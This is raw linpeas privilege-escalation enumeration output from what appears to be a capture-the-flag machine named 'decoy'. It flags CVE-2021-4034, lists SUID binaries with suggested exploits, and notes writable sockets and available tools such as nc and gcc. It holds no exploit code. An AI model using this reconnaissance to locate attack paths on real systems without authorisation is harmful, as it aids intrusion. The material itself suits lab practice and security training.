╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version                                                                                                                                                             
Sudo version 1.8.27                                                                                                                                                                                                                         

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034                                                                                                                                                                                                                 

Potentially Vulnerable to CVE-2022-2588



╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses                                                                                                                                                     
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin                                                                                                                                                                                
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin

╔══════════╣ Date & uptime
Mon 07 Nov 2022 04:37:34 AM EST                                                                                                                                                                                                             
 04:37:34 up 45 min,  1 user,  load average: 0.00, 0.02, 0.08

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk                                                                                                                                                                                                                                        
sda
sda1
sda2
sda5

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices                                                                                                                                                                                                   
UUID=13cd44ba-1a46-4da4-a792-5cd83df52fbf /               ext4    errors=remount-ro 0       1                                                                                                                                               
UUID=42504925-7415-4691-8b03-73d4ec1ea8b7 none            swap    sw              0       0
/dev/sr0        /media/cdrom0   udf,iso9660 user,noauto     0       0
/dev/sr1        /media/cdrom1   udf,iso9660 user,noauto     0       0

╔══════════╣ Environment
╚ Any private information inside environment variables?                                                                                                                                                                                     
HISTFILESIZE=0                                                                                                                                                                                                                              
MAIL=/var/mail/296640a3b825115a47b68fc44501c828
USER=296640a3b825115a47b68fc44501c828
SSH_CLIENT=192.168.56.137 35748 22
XDG_SESSION_TYPE=tty
SHLVL=1
HOME=/home/296640a3b825115a47b68fc44501c828
OLDPWD=/home/296640a3b825115a47b68fc44501c828
SSH_TTY=/dev/pts/0
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
LOGNAME=296640a3b825115a47b68fc44501c828
_=./linpeas.sh
XDG_SESSION_CLASS=user
TERM=xterm-256color
XDG_SESSION_ID=46
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin
XDG_RUNTIME_DIR=/run/user/1000
LANG=en_US.UTF-8
HISTSIZE=0
SHELL=/bin/rbash
PWD=/tmp
SSH_CONNECTION=192.168.56.137 35748 192.168.56.158 22
HISTFILE=/dev/null

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed                                                                                                                                      
dmesg Not Found                                                                                                                                                                                                                             
                                                                                                                                                                                                      

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                                                                                                                                                                   
NEXT                         LEFT          LAST                         PASSED    UNIT                         ACTIVATES                                                                                                                    
Mon 2022-11-07 04:39:00 EST  1min 19s left Mon 2022-11-07 04:09:01 EST  28min ago phpsessionclean.timer        phpsessionclean.service
Mon 2022-11-07 06:09:01 EST  1h 31min left Mon 2022-11-07 03:52:00 EST  45min ago apt-daily-upgrade.timer      apt-daily-upgrade.service
Mon 2022-11-07 06:27:19 EST  1h 49min left Mon 2022-11-07 03:52:00 EST  45min ago apt-daily.timer              apt-daily.service
Mon 2022-11-07 07:33:58 EST  2h 56min left Mon 2022-11-07 03:52:00 EST  45min ago anacron.timer                anacron.service
Tue 2022-11-08 00:00:00 EST  19h left      Mon 2022-11-07 03:52:00 EST  45min ago logrotate.timer              logrotate.service
Tue 2022-11-08 00:00:00 EST  19h left      Mon 2022-11-07 03:52:00 EST  45min ago man-db.timer                 man-db.service
Tue 2022-11-08 04:06:59 EST  23h left      Mon 2022-11-07 04:06:59 EST  30min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                                                                                                                                                                   
                                                                                                                                                                                                                                            
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets                                                                                                                                                                  
/etc/systemd/system/sockets.target.wants/avahi-daemon.socket is calling this writable listener: /run/avahi-daemon/socket                                                                                                                    
/usr/lib/systemd/system/avahi-daemon.socket is calling this writable listener: /run/avahi-daemon/socket
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets                                                                                                                                                                  
/run/avahi-daemon/socket                                                                                                                                                                                                                    
  └─(Read Write)
/run/cups/cups.sock
  └─(Read Write)
/run/dbus/system_bus_socket
  └─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/journal/syslog
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/udev/control
/run/user/1000/bus
  └─(Read Write)
/run/user/1000/systemd/notify
  └─(Read Write)
/run/user/1000/systemd/private
  └─(Read Write)
/var/run/dbus/system_bus_socket
  └─(Read Write)

╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                                                                                                                                                                    
Possible weak user policy found on /etc/dbus-1/system.d/avahi-dbus.conf (  <policy user="avahi">)                                                                                                                                           
Possible weak user policy found on /etc/dbus-1/system.d/avahi-dbus.conf (  <policy group="netdev">)
Possible weak user policy found on /etc/dbus-1/system.d/bluetooth.conf (  <policy group="bluetooth">
  <policy group="lp">)
Possible weak user policy found on /etc/dbus-1/system.d/wpa_supplicant.conf (        <policy group="netdev">)

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                                                                                                                                                                    
NAME                                   PID PROCESS         USER             CONNECTION    UNIT                      SESSION    DESCRIPTION                                                                                                  
:1.0                                   266 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service -          -
:1.111                                6260 busctl          296640a3b825115a :1.111        session-46.scope          46         -
:1.17                                  531 cupsd           root             :1.17         cups.service              -          -
:1.18                                  532 cups-browsed    root             :1.18         cups-browsed.service      -          -
:1.19                                  532 cups-browsed    root             :1.19         cups-browsed.service      -          -
:1.2                                   343 wpa_supplicant  root             :1.2          wpa_supplicant.service    -          -
:1.4                                     1 systemd         root             :1.4          init.scope                -          -
:1.5                                   355 avahi-daemon    avahi            :1.5          avahi-daemon.service      -          -
:1.6                                   346 systemd-logind  root             :1.6          systemd-logind.service    -          -
:1.96                                 1009 systemd         296640a3b825115a :1.96         user@1000.service         -          -
com.hp.hplip                             - -               -                (activatable) -                         -
fi.epitest.hostap.WPASupplicant        343 wpa_supplicant  root             :1.2          wpa_supplicant.service    -          -
fi.w1.wpa_supplicant1                  343 wpa_supplicant  root             :1.2          wpa_supplicant.service    -          -
org.bluez                                - -               -                (activatable) -                         -
org.freedesktop.Avahi                  355 avahi-daemon    avahi            :1.5          avahi-daemon.service      -          -
org.freedesktop.ColorManager             - -               -                (activatable) -                         -
org.freedesktop.DBus                     1 systemd         root             -             init.scope                -          -
org.freedesktop.PolicyKit1               - -               -                (activatable) -                         -
org.freedesktop.hostname1                - -               -                (activatable) -                         -
org.freedesktop.locale1                  - -               -                (activatable) -                         -
org.freedesktop.login1                 346 systemd-logind  root             :1.6          systemd-logind.service    -          -
org.freedesktop.network1                 - -               -                (activatable) -                         -
org.freedesktop.resolve1                 - -               -                (activatable) -                         -
org.freedesktop.systemd1                 1 systemd         root             :1.4          init.scope                -          -
org.freedesktop.timedate1                - -               -                (activatable) -                         -
org.freedesktop.timesync1              266 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service -          -


                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════                                                                                                                                                         
                              ╚═════════════════════╝                                                                                                                                                                                       
╔══════════╣ Hostname, hosts and DNS
60832e9f188106ec5bcc4eb7709ce592                                                                                                                                                                                                            
127.0.0.1       localhost
127.0.1.1       decoy

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 192.168.1.1
dnsdomainname Not Found
                                                                                                                                                                                                                                            
╔══════════╣ Interfaces
default         0.0.0.0                                                                                                                                                                                                                     
loopback        127.0.0.0
link-local      169.254.0.0

enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.56.158  netmask 255.255.255.0  broadcast 192.168.56.255
        inet6 fe80::a00:27ff:fe3c:d465  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:3c:d4:65  txqueuelen 1000  (Ethernet)
        RX packets 562827  bytes 75929221 (72.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 430585  bytes 181509010 (173.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 138  bytes 13640 (13.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 138  bytes 13640 (13.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                                                                                               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                                                                                                                                                           
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 ::1:631                 :::*                    LISTEN      -                   

╔══════════╣ Can I sniff with tcpdump?
No                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                            


                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════                                                                                                                                                         
                               ╚═══════════════════╝                                                                                                                                                                                        
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users                                                                                                                                                                    
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)                                                                                                         

╔══════════╣ Do I have PGP keys?
gpg Not Found                                                                                                                                                                                                                               
netpgpkeys Not Found                                                                                                                                                                                                                        
netpgp Not Found                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                                                            
                                                                                                                                                                                                                                            
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens                                                                                                                                                      
ptrace protection is disabled (0)                                                                                                                                                                                                           
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2                                                                                                                                  
                                                                                                                                                                                                                                            
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                                                                                                             

╔══════════╣ Users with console
296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash                                                                                                                                          
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                                                                                                                      
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=105(avahi-autoipd) gid=113(avahi-autoipd) groups=113(avahi-autoipd)
uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(avahi) gid=117(avahi) groups=117(avahi)
uid=108(saned) gid=118(saned) groups=118(saned),116(scanner)
uid=109(colord) gid=119(colord) groups=119(colord)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(hplip) gid=7(lp) groups=7(lp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=9(news) gid=9(news) groups=9(news)

╔══════════╣ Login now
 04:37:41 up 45 min,  1 user,  load average: 0.15, 0.06, 0.09                                                                                                                                                                               
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
296640a3 pts/0    192.168.56.137   04:33   13.00s  0.04s  0.00s w

╔══════════╣ Last logons
root     pts/2        Sat Jun 27 18:13:40 2020 - Sat Jun 27 18:13:41 2020  (00:00)     192.168.1.162                                                                                                                                        
root     pts/0        Sat Jun 27 17:41:12 2020 - Sat Jun 27 19:00:13 2020  (01:19)     192.168.1.162
reboot   system boot  Sat Jun 27 17:40:50 2020 - Sat Jun 27 19:00:13 2020  (01:19)     0.0.0.0
root     pts/0        Sat Jun 27 17:39:24 2020 - Sat Jun 27 17:40:32 2020  (00:01)     192.168.1.162
root     pts/0        Sat Jun 27 17:39:21 2020 - Sat Jun 27 17:39:22 2020  (00:00)     192.168.1.162
root     pts/0        Sat Jun 27 17:38:30 2020 - Sat Jun 27 17:39:19 2020  (00:00)     192.168.1.162
root     tty1         Sat Jun 27 17:37:12 2020 - down                      (00:03)     0.0.0.0
reboot   system boot  Sat Jun 27 17:35:46 2020 - Sat Jun 27 17:40:33 2020  (00:04)     0.0.0.0

wtmp begins Sat Jun 27 17:35:46 2020

╔══════════╣ Last time logon each user
Username         Port     From             Latest                                                                                                                                                                                           
root             pts/0    192.168.1.162    Tue Jul  7 17:00:26 -0400 2020
296640a3b825115a47b68fc44501c828 pts/0    192.168.56.137   Mon Nov  7 04:33:30 -0500 2022

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
                                                                                                                                                                                                                                            
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
                                                                                                                                                                                                                                            


                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════                                                                                                                                                          
                             ╚══════════════════════╝                                                                                                                                                                                       
╔══════════╣ Useful software
/usr/bin/base64                                                                                                                                                                                                                             
/usr/bin/g++
/usr/bin/gcc
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/sudo
/usr/bin/wget
/usr/bin/xterm

╔══════════╣ Installed Compilers
ii  g++                           4:8.3.0-1                           amd64        GNU C++ compiler                                                                                                                                         
ii  g++-8                         8.3.0-6                             amd64        GNU C++ compiler
ii  gcc                           4:8.3.0-1                           amd64        GNU C compiler
ii  gcc-8                         8.3.0-6                             amd64        GNU C compiler
/usr/bin/gcc

╔══════════╣ Searching mysql credentials and exec
Found readable /etc/mysql/my.cnf                                                                                                                                                                                                            
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/

╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw-r--r-- 1 root root 869 Jan 29  2020 /etc/mysql/mariadb.cnf                                                                                                                                                                              
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/


╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.38 (Debian)                                                                                                                                                                                      
Server built:   2019-10-15T19:53:42
httpd Not Found
                                                                                                                                                                                                                                            
Nginx version: nginx Not Found
                                                                                                                                                                                                                                            
/etc/apache2/mods-available/php7.3.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-available/php7.3.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.3.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.3.conf:    SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-enabled/php7.3.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-enabled/php7.3.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.3.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.3.conf:    SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Jun 27  2020 /etc/apache2/sites-enabled                                                                                                                                                                         
drwxr-xr-x 2 root root 4096 Jun 27  2020 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Jun 27  2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>


-rw-r--r-- 1 root root 1332 Apr  2  2019 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Jun 27  2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

-rw-r--r-- 1 root root 72293 Jun 27  2020 /etc/php/7.3/apache2/php.ini
allow_url_fopen = On
allow_url_include = On
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 71905 Jun 27  2020 /etc/php/7.3/cli/php.ini
allow_url_fopen = On
allow_url_include = On
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On



╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Jun 27  2020 /etc/ldap


╔══════════╣ Searching ssl/ssh files
PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jun 27  2020 /etc/pam.d
-rw-r--r-- 1 root root 2133 Jan 31  2020 /etc/pam.d/sshd




╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Jun 27  2020 /usr/share/keyrings




╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
gpg Not Found
netpgpkeys Not Found
netpgp Not Found

-rw-r--r-- 1 root root 8132 Apr 23  2019 /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Apr 23  2019 /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Apr 23  2019 /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 5106 Apr 23  2019 /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg
-rw-r--r-- 1 root root 5115 Apr 23  2019 /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg
-rw-r--r-- 1 root root 2763 Apr 23  2019 /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg
-rw-r--r-- 1 root root 7443 Apr 23  2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Apr 23  2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Apr 23  2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
-rw-r--r-- 1 root root 8132 Apr 23  2019 /usr/share/keyrings/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Apr 23  2019 /usr/share/keyrings/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Apr 23  2019 /usr/share/keyrings/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 5106 Apr 23  2019 /usr/share/keyrings/debian-archive-jessie-automatic.gpg
-rw-r--r-- 1 root root 5115 Apr 23  2019 /usr/share/keyrings/debian-archive-jessie-security-automatic.gpg
-rw-r--r-- 1 root root 2763 Apr 23  2019 /usr/share/keyrings/debian-archive-jessie-stable.gpg
-rw-r--r-- 1 root root 48747 Apr 23  2019 /usr/share/keyrings/debian-archive-keyring.gpg
-rw-r--r-- 1 root root 23889 Apr 23  2019 /usr/share/keyrings/debian-archive-removed-keys.gpg
-rw-r--r-- 1 root root 7443 Apr 23  2019 /usr/share/keyrings/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Apr 23  2019 /usr/share/keyrings/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Apr 23  2019 /usr/share/keyrings/debian-archive-stretch-stable.gpg



╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Mar  1  2019 /usr/share/bash-completion/completions/postfix


╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 69 Feb 16  2020 /etc/php/7.3/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Feb 16  2020 /usr/share/php7.3-common/common/ftp.ini


╔══════════╣ Analyzing Windows Files (limit 70)
lrwxrwxrwx 1 root root 22 Jun 27  2020 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf
lrwxrwxrwx 1 root root 24 Jun 27  2020 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 83 Jun 27  2020 /var/lib/dpkg/alternatives/my.cnf

╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3526 Apr 18  2019 /etc/skel/.bashrc
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27  2020 /home/296640a3b825115a47b68fc44501c828/.bashrc

-rw-r--r-- 1 root root 807 Apr 18  2019 /etc/skel/.profile
-rwxr-xr-x 1 root root 807 Jun 27  2020 /home/296640a3b825115a47b68fc44501c828/.profile

                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 63K Jan 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root 35K Jan 10  2019 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 23K Jan 15  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 154K Feb  2  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 63K Jul 27  2018 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 83K Jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 51K Jan 10  2019 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 53K Jul 27  2018 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 19K Jan 15  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Jan 31  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 50K Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root tty 35K Jan 10  2019 /usr/bin/wall
-rwxr-sr-x 1 root ssh 315K Jan 31  2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 71K Jul 27  2018 /usr/bin/chage
-rwxr-sr-x 1 root crontab 43K Oct 11  2019 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31K Jul 27  2018 /usr/bin/expiry
-rwxr-sr-x 1 root tty 15K May  4  2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 19K Dec  3  2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 10K Feb 18  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 39K Feb 14  2019 /usr/sbin/unix_chkpwd

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/libc.conf
/usr/local/lib
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu

╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current env capabilities:
Current: =
Current proc capabilities:
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

Parent Shell capabilities:
0x0000000000000000=

Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3129 Feb 10  2019 usr.bin.man
-rw-r--r-- 1 root root  540 Apr 10  2019 usr.sbin.cups-browsed
-rw-r--r-- 1 root root 5552 Apr 25  2020 usr.sbin.cupsd

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found

╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2020-07-07+17:06:17.4942903680 /home/296640a3b825115a47b68fc44501c828/user.txt
2020-07-07+16:19:42.2450607880 /home/296640a3b825115a47b68fc44501c828/honeypot.decoy
2020-06-27+17:40:13.6903845330 /home/296640a3b825115a47b68fc44501c828/.profile

╔══════════╣ Unexpected in root
/vmlinuz
/initrd.img
/initrd.img.old
/vmlinuz.old

╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 12
drwxr-xr-x  2 root root 4096 Jun 27  2020 .
drwxr-xr-x 89 root root 4096 Jul  7  2020 ..
